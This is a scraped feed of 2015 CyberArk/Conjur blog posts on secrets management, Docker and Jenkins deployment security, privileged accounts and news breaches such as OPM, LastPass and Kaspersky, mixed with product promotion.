Step 3 – Define the security policy

The server will use role-based access control. We’ll declare this using a policy document and commit it to the server code repository.

https://github.com/conjurdemos/WebQuake/blob/master/Server/policy.rb

To deploy the WebQuake server, an administrator will load the policy to create application roles and resources.

The gatekeeper will run outside the game, enforcing the security policy before traffic reaches the game. A dedicated security layer allows the application developer to focus on the application, not on security. The gatekeeper will enable us to use separate roles for system administrators, regular game players, and game superusers (players who can use rcon).

Step 4 – Assign client (user) identity and grant roles

To use the server, clients must present an auth token to the gatekeeper. They can obtain this token from the security authentication service, by presenting a username and password (or API key).


Each client is assigned these credentials, and granted one of the roles defined in the policy.

Step 5 – Deploy

To make the application easier to deploy, we’ll package each component as a Docker container. Then, both the client and server can be launched and managed using Docker tools.

(If all the Dockerizing details were presented here, this would quickly turn into a post about Docker! Read Securing Docker With Secrets and Dynamic Traffic Authorization for details.)

Demo

The full WebQuake application now consists of:

  • Web, a dockerized HTTP server, serving static assets

  • Proxy forwarder running on the local machine, intercepting outbound requests

  • Web browser

  • Server Gatekeeper intercepting traffic, authorizing it, and passing authorized traffic through to the server.


View a complete run-through! (YouTube, 6 minutes)

 

]]>
Delivering Conjur with Vagrant https://www.cyberark.com/blog/delivering-conjur-with-vagrant/ Wed, 15 Jul 2015 15:34:00 +0000 https://cyberarkvx2.wpengine.com/blog/delivering-conjur-with-vagrant/  

The team at Conjur helps our customers deploy their application into many different environments: cloud providers like AWS and Joyent, internal VM clusters, bare-metal setups, and local VMs for evaluation. When we get down to it, though, these different configurations can all be setup as wrappers around around a fundamental Conjur LXC container. To package that up for all of these different setups we use Vagrant. The Vagrant plugin ecosystem makes it easy to swap in, and deploy to, different providers.

One Vagrantfile to rule them all

This method of standing up Conjur assumes you have Vagrant and some plugins (such as vagrant-berkshelf) installed. As soon as these prerequisites are met, it takes only three steps to get new Conjur server up and running:

  1. Clone the public Git repo https://github.com/conjurinc/appliance-lxc
  2. Obtain from Conjur a non-public download URL for the Conjur LXC image, and export it  as environment variable INSTALLER_URL
  3. vagrant up with provider of your choice (so far we’ve tested only Virtualbox and AWS, but other platforms should work with only minor modifications using Ubuntu 12 LTS or Ubuntu 14 LTS as the base OS)

In about 10 minutes, Conjur will be set up and running inside this Vagrant-managed server (either virtual or cloud), and is ready to accept traffic after a pretty simple configuration.

Deployment architecture

Inside the server, Conjur runs as an LXC container named “conjur-appliance”:

vagrant-conjur

For your convenience, the Conjur CLI and Docker are also installed on server, so it’s immediately possible to use the CLI for learning and experimenting with Conjur. For example, all the Conjur Demos will happily run in this server environment.

This configuration unlocks many interesting options for experimenting with Conjur:

  1. Snapshotting and hard-reset of Conjur appliance is extremely easy, because LXC containers can be backed up and restored with lxc-clone utility.
  2. It’s possible to make a snapshot of an appliance and copy it to other server(s) as just a tarball.
  3. The server can become a test lab for HA setups, with all components deployed on the same host.
  4. Appliance upgrade can potentially be done within same server, just by deploying new version of an LXC container, and performing a zero-downtime migration.

Turn it on

The Conjur server set up by vagrant is ‘blank’, which means it needs to be configured before it will operate.

To set up the simplest (“standalone”) version of Conjur, three parameters need to be defined:

  1. password — admin password
  2. hostname — the DNS name used by external applications to connect to Conjur
  3. account — organisational account (typically the name of a company), which is a constant serving as a prefix for all Conjur IDs

Configuration is performed by the evoke command-line utility which is built in to the Conjur container. To launch it run vagrant ssh and then lxc-attach to the Conjur container.

BE SURE AND SET hostname, password, and account VARIABLES IN YOUR SHELL ON THE SERVER!

# login to server
workstation$ vagrant ssh
# configure appliance
server$ sudo lxc-attach -n conjur-appliance -- evoke configure standalone -h $hostname -p $password $account
…<SNIPPED>...
# check the appliance availability
server$ curl -k https://conjur/api/info
{“account”:”demo”}
# configure local client to use the appliance
server$ conjur init -h conjur

Now, you’re all set. Conjur logs are stored under /var/lib/lxc/conjur-appliance/rootfs/var/log/conjur

Let the traffic flow

As seen from commands above, within the server, Conjur is available at short DNS names “conjur” and “conjur-appliance”, which point to the internal IP 10.0.1.2. But how could this container be exposed to outer world?

It already is. Within the server, networking is set up so that all inbound traffic on ports 443 (ssl), 636 (ldaps) and 5432 (postgres, for replication purposes) is routed to the internal IP of Conjur LXC container.

All you have to do is to let clients find the server by appropriate configuration of your network (DNS, and in some cases, routing). DNS name is supposed to be the same as $hostname parameter provided during configuration.

Summary

Now, Vagrant-based deployment can work equally well for local Virtualbox labs and production-level AWS setups. No specific knowledge of Vagrant and LXC is needed to get Conjur just up and running.

However, if you feel brave enough to get to some familiarity with LXC, it will definitely pay back. It’s not the goal of this post to describe all possible configurations and use cases, but the ability to run many Conjurs in the same virtual server opens a lot of opportunities for nice and elegant engineering solutions, both for experimental and production purposes.

Here are two blog posts we wrote about LXC that you might find useful:

Please, do not hesitate to share your experience with us. We’re always happy to hear from you  at support@conjur.net.

 

]]>
21 Million Social Security Numbers Leaked and Counting  https://www.cyberark.com/blog/21-million-social-security-numbers-leaked-and-counting/ Fri, 10 Jul 2015 21:03:00 +0000 https://cyberarkvx2.wpengine.com/blog/21-million-social-security-numbers-leaked-and-counting/  

Two government breaches that leaked the confidential information of millions of Americans made headlines last month. The second breach made news again this week as the initial calculations of how many people whose information had been compromised were drastically too low. The Office of Personnel Management (OPM) just announced that an enormous 21 million social security numbers were jeopardized in the breach.

As is typical with any major breach, there has been a great deal of speculation as to what happened and who is to blame. Here are five interesting articles about the cyber attack. Each delivers different details and gives you varying perspectives on the incident.

  1. This article from the National Journal  reports that the data breach occurred back in May 2014 and that it is being tied to China. FBI Director James Comey was among the millions of people affected. People who underwent background checks during or after the year 2000 are very likely to have been affected, however, those who had checks prior to 2000 could still be compromised.
  2. This Wall Street Journal article reveals that the hackers accessed the Standard Form 86, also called the SF-86. This form has information not only about the applicants themselves but also personal information about their family members and friends. The records that were accessed date back over 20 years.
  3. Wired reports that more than just government employees were impacted by the breach. The article states that because the hackers had been in the system for so long we still don’t know how much information they actually accessed, something that might take a good deal of time to figure out. The article also criticizes how the government is handling the situation, outlining some key questions that must be answered going forward.
  4. This opinion piece from The Huffington Post highlights that although this breach might not be the biggest we have seen in terms of the number of people affected, it surpasses every other attack in scope and depth of information. The all-inclusive and highly sensitive nature of the personal details taken makes this breach potentially life altering for the victims.
  5. The criticisms of OPM Director Katherine Archuleta are highlighted in this article from CNN. Some of the criticisms are that she had no background in technology and she never spoke with the Director of the FBI to discuss the investigation. The piece also points out that prior to accepting the job Archuleta promised, “If confirmed as director of OPM, improved management of OPM’s IT, including proper security and data management, will be one of my top priorities.”  Archuleta has recently resigned.

Read a good article about the OPM breach? Leave a comment below or tweet to us @ConjurInc, we would love to hear from you! Check back next week for more info about what’s going on in the news.

 

]]>
Why Continuous Integration And Continuous Delivery Are Not The Same https://www.cyberark.com/blog/why-continuous-integration-and-continuous-delivery-are-not-the-same/ Wed, 08 Jul 2015 14:15:00 +0000 https://cyberarkvx2.wpengine.com/blog/why-continuous-integration-and-continuous-delivery-are-not-the-same/  

Jenkins is a powerful platform for continuous integration.  As enterprises embrace high velocity deployments enabled by DevOps, the demands on Jenkins have increased.  Its common for Jenkins to be used not just for building artifacts, but to actually deploy the artifacts to production as well.  Creating artifacts is not a particularly sensitive operation, but deploying artifacts to production requires rigorous security controls.  Jenkins is a tool for collaboration and visibility and therefore not well suited to provide the restricted access required for such sensitive credentials and processes.

Many organizations have attempted to solve this problem in the following ways:

  • Running multiple Jenkins masters – each with their own set of allowed users thus restricting who can push to production.

  • Adding Jenkins Plugins – there are some very good third party plugins focused on access control and privileges.

  • Create a dedicated “Jenkins management” team –  due to the complexity of the Jenkins eco-system, it’s hard to rotate other team members onto the Jenkins team, which limits communication and collaboration.

Ultimately, the problem with these approaches is that they all fail to address the underlying cause of the problem: Continuous Integration and Deployment are separate concerns.  When a single server is trying to perform both of these functions, many tensions arrive which are solvable by re-thinking the proper roles and workflows.

Can you Answer the Following Questions?

  1. Which people, machines and code can deploy which applications to production?

  2. Which people, machines and code have access to the production deployment credentials?

  3. How are the access controls for #1 and #2 implemented and managed?

Knowing the answers to these questions is essential to passing a security audit or assisting in the analysis and remediation of a security incident.  The reference architecture described below will allow an organization to answer these questions and be more secure while reducing friction and increasing velocity.

deploymentserverrefarch

As you can see for the picture above Jenkins does not directly deploy to production, but rather simply adds artifacts to a repository. It has permission to trigger the release server, specifying the name and version of an artifact.

When the deployment server receives the deploy call, it first checks if the caller (person or client service) is authorized to perform the specified deploy operation.  The mechanics of this authorization check can vary according to the implementation details of the deployment server:

  • If the Deployment Server exposes the deploy capability via a set of shell scripts, then the Deployment Server should validate that the SSH Key presented is trusted and map the identity of the caller to a user in the underlying operating system.  Along with the OS user come a list of groups and sudoers permissions. OS permissions can be used to enforce who can run the script.

  • If the Deployment Server exposes the deploy capability via a set of Web Services, then the Deployment Server can be protected by a traffic authorization gatekeeper.  The gatekeeper only allows authorized clients to invoke the deploy service.

Once the request is authorized, the deployment server retrieves the artifact and the deployment credentials (from a Secrets Server).  Of course, the Secrets Server also performs an authorization check to ensure that the Deployment Server is authorized to access the specified credentials. Finally, using those credentials, the Deployment Server pushes the tested package into the designated environment (test, stage, production, etc).

Conclusion

By taking a step back and looking at the root cause of the problem – using Jenkins for more than just Continuous Integration – and adopting the reference architecture above – enterprises can eliminate this bottleneck in their deployment pipeline, be more secure, and ultimately more responsive to the needs of the business.  At Conjur, we help organizations solve this problem through our 5 step “Continuous Secrets Delivery” process.   You can see if for yourself by clicking below.

 

]]>
Improve Your Docker Workflow with Summon https://www.cyberark.com/blog/improve-your-docker-workflow-with-summon/ Mon, 06 Jul 2015 16:59:00 +0000 https://cyberarkvx2.wpengine.com/blog/improve-your-docker-workflow-with-summon/  

In June we released Summon, an open-source tool to make it easier to use secrets in modern workflows. As part of the release, we proposed secrets.yml, a format that allows you to check references to secrets into source control. In this post I’ll talk about why this matters and show you how you can improve and secure your Docker workflow with Summon.

Secrets are dependencies

Here is Gene Kim talking about the results from the 2014 State of DevOps survey:

“One of the most startling findings this year studying over 9,200 survey responses was that version control was consistently one of the highest predictors of performance. And furthermore, that version controlling the production environment was an even higher predictor of performance than version controlling code!”

So, if you want a chance at being a high-performance IT organization, everything you need to recreate your production environment should be in source control. You write your server configurations as code with config management tools, write or generate code for database migrations, networks are now exporting RESTful APIs for programmatic control, etc. DevOps is pushing “everything as code” to great success.

Security is working hard to keep up and maintain visibility. We are working on open-source tools at Conjur to help. The first, Summon, aims to tackle the issue of secrets and source control. Your applications need passwords, API tokens, SSL certificates – but you can’t check them in. They end up in a fugue state, wandering around your infrastructure and developer laptops. The engineers that need credentials waste time hunting them down and auditors are not impressed. Unlike PII or PCI data, there is no standard for securing secrets today. Checking encrypted secrets into source control only means that you have new secrets – the keys you need for decryption.

Secrets are dependencies. We should track them in source control. Here’s a fun game – at your next dev meeting, suggest that you stop checking your application dependencies into source control. No more requirements.txt, Gemfile or composer.json. Talk through how removing these files would impact your release cycle. Our proposal is that you use Summon + secrets.yml to track your secrets in source control.

Using Docker with Summon

To use Docker effectively, it’s best to treat your containers as 12-factor applications that receive their configuration via the environment. That way, you can move containers between environments as immutable artifacts. Some of the configuration that changes between environments will be sensitive credentials – “when I’m running in production I need the production database password”.

In this hands-on example, we walk through running a deploy script running inside a Docker container. Summon provides credentials using your OS’s keychain as a secrets store.

 

]]>
Winston Churchill, Security, and DevOps https://www.cyberark.com/blog/winston-churchill-security-and-devops/ Thu, 02 Jul 2015 20:17:00 +0000 https://cyberarkvx2.wpengine.com/blog/winston-churchill-security-and-devops/  

At Conjur, we love Winston Churchill — not just for his seemingly inexhaustible supply of relevant quotations, but also because he was such a fan of afternoon naps. Mr. Churchill, of course, led Britain through World War II – holding the nation together with limited resources, amidst a very threatening landscape.

Many security leaders can relate to this, with their organizations facing tangible external threats, ever-stricter compliance requirements, and incessant demand from the line-of-business for faster delivery of applications. It’s this last requirement that has driven many organizations to adopt DevOps – also known as continuous deployment – to accelerate application delivery and business value through collaboration, communication and automation between development, the business, and IT.

continuouschurchill

From a security perspective, DevOps is often perceived as, to misquote our friend Mr. Churchill – “a riddle, wrapped in a mystery, inside an enigma.” Why is this the case? Don’t security teams generally have a good grasp of their organization’s production environment? Aren’t security architects typically involved in application design and development processes?

Not having good visibility into the security of the DevOps tool chain and infrastructure is unacceptable to the security team, as it introduces tremendous  compliance and security risk. At the same time, for most organizations that adopt it, DevOps brings tremendous business and technology benefits. The right answer, of course, is for Security to embrace DevOps, and help the organization safely and securely execute it.

DevOps, at its heart, requires intense collaboration and communication between development, IT, and the business. InfoSec needs to be part of this collaboration, to influence and define the tools, processes, and policies that are expressed by a DevOps initiative. This is a worthwhile and interesting initiative – but it’s not always an easy one. In support of this, we’ve created a simple blueprint here, “Security At Scale”

blueprintsnap

Organized into 6 actionable steps, this guide provides concrete recommendations for how your security team can properly engage with and support your organization’s DevOps initiative.

Winston Churchill did not work in technology, but he clearly understood the need for security, and knew how to lead. Your team can lead the way toward a more secure and robust DevOps initiative – and the six steps in this blueprint are a great way to begin.

 

]]>
What’s Next After The LastPass Breach? https://www.cyberark.com/blog/whats-next-after-the-lastpass-breach/ Thu, 25 Jun 2015 14:52:00 +0000 https://cyberarkvx2.wpengine.com/blog/whats-next-after-the-lastpass-breach/  

No doubt you’ve already heard about the recent security hack at LastPass.  In what is an all-too-common trend, even among security-minded organizations, hackers are finding new ways to gain access to privileged information on a regular basis.  While LastPass has confirmed that their security was adequate enough so no actual customer passwords were compromised, it still leaves an unsettling feeling.

lastpass-logo

The main issue isn’t even that another hack occurred, but rather it is happening to supposed ‘security-centric’ companies.  So it begs the question, how secure is “secure enough” in today’s world?  Here are some interesting opinions on this topic that we hope will help you evaluate your own situation:

CBS MoneyWatch asks the question, ‘How secure are password managers?’.  The article weighs the benefits of putting all of your password trust in one basket or if you should diversify your password management while advocating for the use of two-factor identification.

The Cointelegraph wonders if it is finally time for passwordless logins.  The article focuses on the cryptocurrency world and how the recent development of Secure Quick Reliable Login (SQRL) as well as public key cryptography could improve security without the need of passwords.

SecureIDNews tell us not to sweat the LastPass breach.  A consultant interviewed for the article suggests that services like LastPass were specifically designed to remain secure in the event of a breach such as this.

ITBusinessEdge points out that this is LastPass’ third breach since 2011.  They also bring to light that one still needs an unencrypted master password to log into the service and that this password is still an easy target for hackers.

With any breach there will be varying opinions on how best to avoid becoming the next victim of cyber hacking.  While proper password management like two-factor identification and services like LastPass significantly decrease the likelihood of a breach it certainly doesn’t guarantee it.  Properly instituting a zero-trust security architecture can dramatically improve your organization’s overall ability to remain secure as you grow and the techniques used against you improve.

]]>
How To Securely Share Your Private Docker Registry With External Clients and Partners https://www.cyberark.com/blog/how-to-securely-share-your-private-docker-registry-with-external-clients-and-partners/ Tue, 23 Jun 2015 20:44:00 +0000 https://cyberarkvx2.wpengine.com/blog/how-to-securely-share-your-private-docker-registry-with-external-clients-and-partners/  

Today Docker announced their new “Trusted Registry”, which is a commercial version of the open-source Docker Registry image storage and distribution service. Teams can run a Trusted Registry to control how their images are physically stored and enhance their ability to fully own their image distribution pipeline.

Docker Trusted Registry integrates with AD/LDAP, so that access to the registry is controlled based on your Enterprise directory.  It’s an important step forward for container security.

But, there’s much more that can be done to make Docker Registry useful in an Enterprise environment. For workflows involving programmatic access, and  Registry access from beyond the enterprise “perimeter”, Active Directory as a “source of truth” isn’t enough.

What’s needed is true “zero-trust” authentication and authorization that is production ready; granular management of access to the Docker Registry that goes beyond human access, beyond the firewall, and beyond username/password authentication.

Why should Conjur’s programmable traffic authorization platform be used to manage the Docker Registry?  Simply put, it is a stronger, more holistic approach to managing access controls.  Incoming traffic is authenticated and authorized according to user or host (machine, VM, container, code) credentials and customizable privileges via declarative, auditable policy. The resulting audit trail provides a comprehensive record of who and what has accessed the registry.

The recommended architecture for securing the Docker Registry:

 docker-registry-sdf

It’s a secure, token-based scheme which applies “zero trust” security to your Docker Registry, enabling you to grant access to all types of clients without the need to configure and manage VPNs and security groups.  We have written a detailed step-by-step guide in GitHub that will show you how to apply Conjur to your Docker Registry.

https://github.com/conjurinc/docker-registry/blob/master/README.md

This example requires Conjur to operate; but we are working on an open-source service for federated authorization that will enable anyone to apply this reference architecture. [To see how we approach problems like this, check out our open-source project Summon, which reads a secrets.yml file from source control, obtains secrets, and injects them into arbitrary processes like docker run.]

You can also find more details about Conjur can help secure Docker containers at runtime in our recent blog post Securing Docker With Secrets and Dynamic Traffic Authorization.

As always, we welcome your feedback! Find us on Twitter at @ConjurInc.

]]>
To Sudo or Not to Sudo? That is the Question https://www.cyberark.com/blog/to-sudo-or-not-to-sudo-that-is-the-question/ Tue, 23 Jun 2015 15:38:47 +0000 https://www.cyberark.com/blog//

It’s no secret that unsecured privileged accounts represent one of the largest security vulnerabilities today. In the hands of an external cyber attacker or malicious insider, privileged accounts allow attackers to take full control of an organization’s IT infrastructure, disable security controls, steal confidential information, commit fraud and disrupt operations.

One major challenge with managing privileged accounts is that while many IT professionals need privileged access to do their jobs, they don’t need access to the entire network (or to all commands or programs that could be executed). That’s where the principle of least privilege comes in, which dictates that people should only have access to the resources and information necessary for their job function.

One way to enforce this is the free, open source solution called sudo (superuser do). This allows Unix users to access and authenticate to a system with a personal account and escalate privileges to superuser or root to run privileged commands. Sudo can be configured to blacklist or whitelist specific commands for each user. It can also help beef up IT infrastructure security by limiting root access on Unix machines. Sounds great, right? Not so fast. As with everything in life, you get what you pay for.

Organizations looking to enforce least privilege policies often begin by asking “to sudo or not to sudo?” To help you make more informed decisions about whether sudo is the right answer to that question, we’ve published a new security brief outlining five things to consider, including:

  • How secure is sudo? It may not be as secure as you think
  • Need to achieve compliance? Three challenges you’ll likely run into
  • Planning on organizational changes? Think ahead, because sudo won’t scale
  • Can you trust sudo? Questionable reliability often leads to other issues that introduce risk
  • Looking for an alternative to sudo? CyberArk offers a more secure, scalable and reliable alternative for organizations looking to enforce least privilege policies

You can download this free security brief here: https://www.cyberark.com/resource/to-sudo-or-not-to-sudo-that-is-the-question/.
While sudo can be an attractive solution with no acquisition cost, ultimately many organizations realize the hard way that “free” can actually end up costing them a great deal. So before you make the call, make sure you’ve weighed the pros and cons and explored other alternatives that can deliver a higher level of security, scalability and reliability.

]]>
Securing Docker With Secrets and Dynamic Traffic Authorization https://www.cyberark.com/blog/securing-docker-with-secrets-and-dynamic-traffic-authorization/ Thu, 18 Jun 2015 19:04:00 +0000 https://cyberarkvx2.wpengine.com/blog/securing-docker-with-secrets-and-dynamic-traffic-authorization/  

Here at Conjur, we’ve been caught up in the Docker wave like so many of you. The biggest question our users face is: how can Docker be effectively deployed and secured in production, by mid-size and large enterprises?

As we’ve worked with our customers on this problem over the last year or so, we’ve been deeply interested in finding effective security orchestration patterns for Docker which work for many different types of organizations and application architectures. In this post we will summarize several of these patterns, which we hope you’ll find useful.

Secrets

In 2012, Adam Wiggins and his collaborators formulated an excellent set of guidelines for architecting PaaS and container-style applications. These guidelines were formalized as the “12 Factor App”; you can read about them at http://12factor.net/. These guidelines apply very well to Docker containers and images, and studying each one is a valuable exercise for any developer or architect who’s using Docker.

Factor number three states : “Store config in the environment”, and it mandates “strict separation of config from code”. From a security standpoint, the implication is that secrets (SSL certs, database passwords, etc) must be provided to the container through environment variables. Baking secrets into images is an insecure practice which must be avoided.

In response, we’ve developed a fully open-source tool called “Summon” (https://github.com/cyberark/summon/). To quote the Readme:

“Summon is a command-line tool that reads a file in secrets.yml format and injects secrets as environment variables into any process. Once the process exits, the secrets are gone.”

summon-diagram-1

Summon provides several clear benefits for orchestrating secrets into Docker:

  • Secrets are referenced in secrets.yml, a file which is safe to check into source control.

  • Secrets are provided at runtime by a secrets “provider”; thus, the security orchestration is decoupled from the actual provider of the secrets.

  • Summon ensures that secrets are handled according to security best practices; they are never on disk (temp files go to /dev/shm) and they are removed when the managed process (“docker run”) exits.

For example, to provide a database password to a Docker container, you’d create a secrets.yml file which looks like this:

DB_PASSWORD: !var prod/db/password

Then launch the Docker container using the following command:

$ summon docker run -e DB_PASSWORD myapp

Traffic Authorization

In any service-oriented architecture, it’s important to securely govern the allowable communication between the various applications and services. And it’s also important to provide a secure way for key personnel (developers and operations) to interact directly with applications and services when necessary.

This traffic management problem is known by quite a few different names; we generally call it “software-defined firewall” or “identity-defined firewall”.

Traditionally, a couple of different approaches have been used.

  1. All the services are deployed within an enterprise perimeter. Very little additional security is applied to the traffic. This is a hazardous way to operate, and it’s useless in a cloud or hybrid architecture.

  2. Software-defined networking (e.g. AWS Security Groups) are used to govern allowable inbound and outbound traffic. This method is effective, however it’s difficult to manage, and the management tools like AWS Console present a constant threat that the security will be accidentally loosened when people (or code) relax the traffic rules for their own purposes. It’s also hard to interact with these systems from outside the cloud environment, and the security of the application becomes tied to the cloud vendor.

  3. Methods like PKI (SSL mutual auth) or Kerberos govern the traffic. These techniques are hard to manage, and have limitations of their own. For example, fine-grained authorization is not a strength of PKI, and it’s hard to make Kerberos reliable across multi-site (e.g. hybrid cloud and multi-region) deployments. They are also hard to interact with manually (e.g. via cURL, for maintenance and one-off tasks).

A Docker container cluster like Mesos or Kubernetes presents another particular challenge: software-defined networking and security groups cannot be used to gate the traffic, because there are no fixed boundaries between the containers and container groups (“pods”, in Kubernetes parlance).

For regulating HTTP(S) traffic, we advocate for a particular technique involving a Forwarder, Gatekeeper, and Token Broker. It works like this:

  • Each container “pod” (aka “multi-container application”) runs a Gatekeeper container, which intercepts all inbound HTTP(S) traffic and verifies the authenticity of a token which it finds in the Authorization header.

  • The Forwarder is a container which intercepts all outbound traffic and places the token on the Authorization header.

  • The tokens are issued and verified by the Token Broker.

  • Token verification can be cached, so that the latency and throughput of the cluster is minimally impacted.

sdf-diagram

The Forwarder and Gatekeeper are each implemented using Nginx with standard configuration directives plus a bit of Lua scripting. The Forwarder authenticates itself to the Token Broker using a shared secret, which can be provided by Summon. The result is a system with very clear security properties. It’s also easy to manage, it works with any deployment architecture, and it works equally well inside a defined perimeter, or across wide geographic boundaries. In addition, it’s easy for humans to interact with the system; they can run a local Forwarder on their laptop which operates just like the Forwarders in the container pods.

You can see examples of Forwarder and Gatekeeper Nginx configuration in our “sdf-gen” project.

Summary

While the Docker engine has been officially released and stable for about a year, the practices and tooling surrounding Docker deployment and orchestration are still very much in flux. We believe that solid patterns and practices for deploying secrets and managing HTTP(S) traffic between containers can help to accelerate Docker’s enterprise adoption. These patterns need to be tool-independent and “future-proof”, so that Docker orchestration tooling and application architectures can continue to evolve without breaking security. In addition, they should be written as open standards or open source, so that any team can feel comfortable adopting and using them. We are looking forward to working with you to design and develop this new generation of security APIs and tools!

]]>
Using Puppet With A Secrets Server https://www.cyberark.com/blog/using-puppet-with-a-secrets-server/ Thu, 18 Jun 2015 13:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/using-puppet-with-a-secrets-server/  

We are delighted to announce that our CTO Kevin Gilpin will be presenting at PuppetConf in Portland, Oregon this October. During his 45 minute session Using Puppet with a Secrets Server Kevin will discuss the many important advantages of using a secrets server instead of storing secrets in configuration management.

puppetconf-logo

From a security standpoint, secrets servers speed up the path to compliance while offering:

  • end-to-end encryption;
  • access control;
  • detailed auditing of access;
  • purpose-built APIs;
  • dedicated management and reporting tools;
  • support for auto-scaling deployment architectures.

You can take a look at the details of his talk here!

Sounds great, right? Don’t worry, if you haven’t already, there is still time to register for PuppetConf. Kevin will be presenting on Thursday October 8 at 4:45pm in Oregon Ballroom 202! You won’t want to miss his informative session.

Have any questions for Kevin about his talk? Tweet to him @Kegilpin or @ConjurInc. 

]]>
Security Maps For The New Container World [SLIDESHARE] https://www.cyberark.com/blog/security-maps-for-the-new-container-world-slideshare/ Wed, 17 Jun 2015 18:38:00 +0000 https://cyberarkvx2.wpengine.com/blog/security-maps-for-the-new-container-world-slideshare/  

Conjur’s own Josh Bregman recently had the amazing opportunity to present at this year’s QCon New York conference.  What is QCon New York you may ask?

According to their website, “QCon empowers software development by facilitating the spread of knowledge and innovation in the developer community.  A practitioner-driven conference, QCon is designed for technical team leads, architects, engineering directors, and project managers who influence innovation in their teams.”

This vision clearly aligns with our own so thanks again to the QCon community for the opportunity to share some knowledge!  In fact, Josh’s presentation discusses best practices around:

  • Tips on Operating Docker Securely
  • How to Embed Security As a Service
  • Using Software Defined Firewalls for Container Security
  • Reference Architecture for Security Orchestration
  • Continuous Secrets Delivery

Just in case you didn’t have the opportunity to attend the conference, we are providing you with Josh’s full presentation below:

Have questions or comments about this presentation?  We’d love to hear from you!  Simply leave a comment below and we’ll be sure to respond.

 

]]>
eBook: Seven Things to Consider When Evaluating Privileged Account Security Solutions https://www.cyberark.com/blog/ebook-seven-things-to-consider-when-evaluating-privileged-account-security-solutions/ Wed, 17 Jun 2015 14:07:43 +0000 https://www.cyberark.com/blog//

It’s been well documented that privileged accounts are required to carry out a successful attack. Just put yourself in an attacker’s shoes: Do I need access to a particular network segment or want to change firewall rules to enable external communication? Do I want to gain access to the domain controller? Or do I want to dump the database table to capture a competitor’s customer list? Unprotected, unmonitored privileged accounts are your keys to the kingdom and a means to unlock your organization’s most sensitive assets – business critical systems, intellectual property, financial information, audit data and more.

You’re convinced that protecting your organization’s privileged accounts is a security imperative as attackers continue to target them to commandeer infrastructure and execute their attacks. But how do you go about selecting the right solutions from the right provider? You need a guide to know what to expect, and what to look for as you evaluate potential privileged account security solutions.

To help you make more informed decisions, we have introduced a new eBook, outlining seven important questions to ask every potential vendor as part of your assessment process, including:

  1. Is the solution really secure? This comprehensive guide outlines seven critical layers of protection that effective privileged account security solutions should employ, along with a checklist of questions to ask each potential vendor during your assessment.
  2. Can it find and protect all of my accounts? A typical enterprise has at least 3 to 4 times as many privileged accounts as employees, so before you can protect them, you have to be able to find and inventory them all throughout your IT environment.
  3. Can it protect all credentials? A comprehensive privileged account security solution will enable your organization to securely store all types of privileged credentials – including SSH keys – and conceal them from end users to reduce the risk of losing them to the wrong hands.
  4. Will it work in my environment? Your IT environment is unique, tailored to your organization’s specific requirements. Be sure that any solution you consider can protect accounts throughout most – if not all – of your IT environment, not just a few specific platforms.
  5. What protections are provided? It’s important to establish an end-to-end lifecycle approach to privileged account management that can be augmented over time and adapt to your organization’s changing needs and priorities. This approach includes 10 key steps.
  6. How can I minimize the cost of managing it? A complete end-to-end privileged account security solution requires multiple products to secure, manage, control and monitor privileged accounts, as well as detect active threats. As a result, organizations can be faced with the challenge of integrating and managing multiple solutions in order to achieve maximum protection. An effective, one-platform solution can help you avoid four common, costly pitfalls.
  7. How reliable is the vendor? The only way to effectively break the attack chain is to proactively prevent attackers from gaining the elevated administrative privileges needed to reach – and steal – sensitive data inside your organization. That’s why it’s critical to ensure that any potential vendor treats privileged account security as its primary, strategic focus. This guide will arm you with specific, pointed questions to ask each potential provider, to help gauge their commitment to on-going innovation around this critical issue.

Privileged accounts are everywhere. Attack targets and potential security breaches are everywhere. How are you planning to protect what matters most?

To download the free eBook, please visit https://www.cyberark.com/resource/seven-things-to-consider-when-evaluating-privileged-account-security-solutions/.

]]>
Privileged Accounts – the New Espionage ‘Asset’ https://www.cyberark.com/blog/privileged-accounts-the-new-espionage-asset/ Fri, 12 Jun 2015 16:04:05 +0000 https://www.cyberark.com/blog//

Discussions about the breach and infiltration of Kaspersky’s network continue to reinforce the emergence of dangerous attack patterns that are leaving no one out of attackers’ sights – not even a security company.

As we know, attribution of an attack is a difficult part of deconstructing a breach – we can see the signatures in malware, see what networks the attackers used to support the attack, but ultimately, we’re almost never 100 percent sure of attribution.

Ultimately, the question of “who” is less important than the “how.”

The motivation for the attack on Kaspersky appears to be pure espionage activity. According to sources, the malware used to execute the attack was an updated version of Duqu, which features code directly derived from Stuxnet, and was allegedly used to spy on Iran’s trade relationships and efforts to develop nuclear material.

It’s hard to think about espionage activities without harkening back to the Cold War and the push and pull of global intelligence agencies as they tried to gain information on rivals, enemies and friends.

This form of espionage was characterized by nations developing ‘assets’ within the structures they wanted to infiltrate. Assets were typically people of some influence – or with access to those of influence – within the organization being spied on. Developing assets on the ground is critical to a successful espionage campaign.

The same is true when it comes to cyber espionage campaigns. In this world, the privileged account or credential is the most valuable intelligence asset that attackers can use.

Privileged accounts provide complete, anonymous access to, and control of, all parts of IT infrastructure, industrial control systems and critical business data. They exist throughout every businesses. There isn’t one part of the enterprise that isn’t managed by privileged or administrative accounts.

This is why they’re the ultimate intelligence asset for cyber espionage campaigns. Once attackers turn the privileged account into an asset, they can anonymously surveil a company’s security posture, and explore their systems for valuable data and information — often for months at a time.

With this access, attackers can remain virtually undetected, free to exfiltrate information as part of an espionage campaign like this that could allow access to product plans to enable ‘short cuts’ for future attacks, implanting malware as part of a financially motivated attack, or simply destroying a company’s ability to do business, as was done to Sony Pictures.

Stopping Advanced Attacks – Stop Lateral Movement

The Kaspersky attack is another lesson in just how critical it is for attackers to be able to move laterally across the network into different machines and devices. The fact that the attackers used multiple zero day exploits (expensive currency in the hacker world) to facilitate this movement is a sign of how critical it was to the overall attack.

Exploiting privileged accounts is required for lateral movement – by locking down these accounts, and being able to isolate the attack and prevent the escalation of these powerful credentials, organizations can keep attackers confined to the initial footprint of the breach point.

An attacker may or may not be able to find useful information if they’re confined to one employee’s machine, device or single application. This won’t be true if they’re able to steal, exploit and elevate privileges and move about the network freely, accessing databases and information stores.

This is why CyberArk believes that proactive security starts by assuming the attackers will find a way in, and preventing them from moving around the network once they do.

Stay tuned for Part 2 of this post as we take a deeper look at the Kaspersky attack including exploring the zero day connection – including the Kerberos vulnerability – and provide advice to organizations based on what we’ve learned from this and other recent breaches.

]]>
Introducing Summon – Get Your Secrets Into Source Control https://www.cyberark.com/blog/introducing-summon-get-your-secrets-into-source-control/ Wed, 10 Jun 2015 19:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/introducing-summon-get-your-secrets-into-source-control/  

